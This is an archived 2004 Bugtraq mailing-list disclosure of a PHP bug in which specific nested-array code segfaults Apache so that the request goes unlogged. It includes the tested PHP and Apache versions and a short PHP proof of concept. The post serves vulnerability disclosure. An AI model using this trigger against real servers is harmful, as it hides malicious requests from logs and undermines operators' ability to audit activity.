lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 6 Aug 2004 23:25:16 -0000 From: Anthony Debhian <anthony.debhian@...y-for.info> To: bugtraq@...urityfocus.com Subject: [PHP Bug] How to hide a HTTP request in the apache logs Author: Debhian ( anthony.debhian -AT- only-for.info ) PHP Bug #29370 Description: With a certain code, PHP causes a segfault in Apache and the request is not logged. This bug (under Windows) causes an error fatal of apache BUT the server is not stopped with this code. The bug seems to work on all config (php4 / php5 && windows / unix) Tested system: Windows / Apache 1.3.31 / PHP 5.0.0 Windows / Apache 1.3.27 / PHP 4.3.3 Linux / Apache 1.3.24 / PHP 4.2.1 Proof of concept: <? function funcfunc($array,$space="") { foreach($array as $key=>$value) { if(is_array($array[$key])) { $src.=$key; } } return $src; } function funcfunc2($array,$test) { foreach($array['test'] as $key=>$value) { } return $array; } $test['debhy']['debhou']="test1"; $test['debhian']['debh']="test2"; $array=funcfunc($test); $array=funcfunc2($array,"test"); ?> Solution: The php team has not answered the posted bug yet.
Powered by blists - more mailing lists